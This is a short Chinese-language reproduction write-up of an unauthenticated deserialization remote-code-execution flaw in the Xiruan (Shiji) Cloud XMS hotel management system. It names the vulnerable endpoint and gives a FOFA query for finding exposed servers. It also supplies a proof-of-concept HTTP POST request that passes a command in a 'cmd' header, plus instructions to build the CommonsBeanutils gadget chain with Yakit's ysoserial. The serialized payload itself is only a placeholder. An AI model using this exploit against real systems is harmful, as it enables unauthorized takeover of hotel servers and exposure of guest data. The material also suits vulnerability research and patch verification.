西软云XMS 反序列化RCE漏洞复现

0x01 产品简介

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四，五星级中高端酒店提供灵活、高度整合酒店业务，助力酒店智能转型升级。

0x02 漏洞概述

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞，未经身份认证的攻击者可利用此漏洞执行任意代码，获取服务器权限。

0x03 影响范围

 所有版本

0x04 复现环境

FOFA：app="shiji-西软云XMS"

0x05 漏洞复现

PoC

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
cmd: whoami

{
  {hexdec(cb18x的序列化链)}}

使用yakit自带的yso生成CommonsBeanutils183NOCC链